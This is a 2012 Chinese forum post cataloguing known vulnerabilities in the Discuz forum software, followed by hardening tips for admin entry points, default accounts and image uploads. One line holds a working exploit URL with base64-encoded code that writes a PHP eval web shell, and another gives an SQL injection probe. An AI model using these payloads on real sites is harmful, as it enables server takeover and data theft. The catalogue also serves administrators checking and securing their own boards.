Discuz教程网

[二次开发] Discuz论坛的一些入侵渗透手段

[复制链接]
authicon dly 发表于 2012-10-6 20:00:20 | 显示全部楼层 |阅读模式
有相当一部分用户使用Discuz搭建论坛。以前的版本漏洞也相当多,如今还有哪些较新版本存在漏洞,怎么利用?

一:
最近在整改BBS,顺便找了一下公开的漏洞,还是比较多的,看到这些,基本都是对输入的校验不够严格引起的,于是想到了自己的代码,得赶紧去检查优化。
  1. Discuz! 6.x/7.x 全局变量防御绕过漏洞 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞. Discuz! admin\styles.inc.php get-webshell bug 由于Discuz!的admin\styles.inc.php里preg_match正则判断$newcvar变量操作不够严谨,导致执行代码漏洞. Discuz!<5.50 $onlineipmatches 未初始化漏洞 由于Discuz!<5.50的common.inc.php使用preg_match()的变量$onlineipmatches 未初始化漏洞,导致可以容易构造$onlineip Discuz! 1_modcp_editpost.tpl.php xss bug 由于Discuz!的1_modcp_editpost.tpl.php里$orig['message']未过滤,导致一个xss漏洞. Discuz! admin\database.inc.php get-webshell bug 由于Discuz!的admin\database.inc.php里action=importzip解压zip文件时,导致可以得到webshell. Discuz! Reset User Password Vulnerability 由于Discuz! 的 随机数使用的播种缺陷,在找会用户密码时可以暴力得到id的随机hash,从而导致容易修改用户密码的严重漏洞. Discuz! $_DCACHE数组变量覆盖漏洞 [update 11.14] 由于Discuz! 的wap\index.php调用Chinese类里Convert方法在处理post数据时不当忽视对数组的处理,可使数组被覆盖为NULL.当覆盖$_DCACHE时导致导致xss sql注射 代码执行等众多严重的安全问题. Discuz! 路径信息泄露 bug 由于Discuz! cache file的数组$_DCACHE,$_CACHE等的变量名没有初始化导致路径信息泄露. Discuz! member.php xss bug 由于Discuz!的member.php对$listgid并没有初始化导致一个严重的xss bug. Discuz! admin\runwizard.inc.php get-webshell bug 由于Discuz!的admin\runwizard.inc.php里saverunwizardhistory()写文件操作没有限制导致执行代码漏洞. Discuz! modcp\moderate.inc.php 数据库注射bug 由于Discuz!的modcp/moderate.inc.php里$fidadd数组变量没有初始化导致sql注射bug Discuz! moderation.inc.php 数据库'注射' bug 由于Discuz!的include/moderation.inc.php存在一个'二次攻击'导致数据库'注射'的bug Discuz! trade.php 数据库'注射' bug 由于Discuz!的trade.php里的$message处理不严格导致引起数据库操作错误,通过SODB-2008-06而导致xss攻击及数据库信息泄露的漏洞. Discuz! 数据库错误信息xss bug 由于Discuz!在处理数据库的错误信息时对$GLOBALS['PHP_SELF']没有过滤,导致在让数据库出错的情况下导致xss攻击. Discuz!4.x wap\index.php 变量覆盖漏洞 由于Discuz!的wap\index.php处理post的变量不严谨而导致变量覆盖,从而可能导致sql注射/代码执行/xss等攻击. Discuz! cache.func.php信息泄漏的bug 由于Discuz!的\include\cache.func.php缺少访问限制导致版本及补丁消息的泄露. Discuz! flash Crsf bug 由于Discuz!对flash跨域策略文件及上传图片文件处理不严导致可以绕过formhash及Referer的限制,导致csrf攻击. Discuz! admincp.php xss bug 由于Discuz!的后台登陆文件$url_forward没有过滤导致一个严重的xss bug. Discuz![flash] xss bug 由于Discuz!对上传图片文件处理不严及flash标签安全设置不严导致一个严重的xss bug. Discuz 6.x—7.x:WAP高危漏洞,wap\index.php调用Chinese类里Convert方法在处理post数据时不当忽视对数组的处理,可使数组被覆盖为NULL.当覆盖$_DCACHE时导致导致xss sql注射 代码执行等众多严重的安全问题Discuz 7.0-7.2:后台settings.inc.php中写shell漏洞Discuz 7.1-7.2:showmessage bug,利用方式:misc.php?action=imme_binding&resp**e[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}Discuz 7.2:SQL注入漏洞/manyou/sources/notice.phpDiscuz 7.2代码执行漏洞Discuz! x1-1.5 SQL 注入 GetShell EXP Discuz! X1-1.5 notify_credit.php 页面SQL注入漏洞 Discuz! 1.5 跨站脚本攻击漏洞 UC登陆页面存在跨站漏洞DiscuzX1.5 门户管理权限SQL注入BUGDZ-X1.5 论坛后台拿WebShelldiscuz x1.5&discuz 7.2 后台getshell 0dayDISCUZ X1.5 本地文件包含漏洞Discuz! X2:SQL注入漏洞source\module\forum\forum_attachment.phpDiscuz! X2:SQL注入member.php?mod=logging&action=login,提交username=1+and+1=1Discuz!NT 2.x - 3.5.2 SQL注入(0day)Discuz!NT3.5.2文件编辑0Day获取Webshell
复制代码

二:
  1. 因为dx论坛国内用的最多,
  2. 1、一说论坛后台地址,几乎每个人都知道http://论坛地址/admin.php;

  3. 2、管理员账号 首先会想到admin、admin

  4. 3、uc地址 http://论坛地址/uc_server/admin.php

  5. 第一条和第三条,这个必须改掉入口地址,虽然后台能设置访问后台的ip限制,但不保险!尤其是uc后台,dx默认你只要输入http://论坛地址/uc_server/这个东东,就直接跳转到后台入口,这个必须干掉!
  6. 至于第二条,必须删掉admin账号,在dx配置文件里另外设置某个账号为创始人即可。
复制代码

三:

  1. DX里有个很严重的漏洞就是,上传附件和头像,经常有黑客把可执行的php代码放到图片中,这样当图片上传成功到服务器上后,用可执行代码进行攻击服务器
  2. Discuz X2 版本0817:就是那几天出现的用户登录限制,大致就是后台注册设置默认为username,password关键词被利用(这个我也没弄明白是怎么回事)
  3. Discuz X2 版本1221:通过unicode编码灌水贴(还无补丁,只能通过腾讯云安全插件搞定)
复制代码




上一篇:Discuz X2.5论坛最近老自动退出的解决方法
下一篇:IE里Iframe的Cookie问题解决办法总结
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1314学习网 ( 浙ICP备10214163号 )

GMT+8, 2025-5-2 01:28

Powered by Discuz! X3.4

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表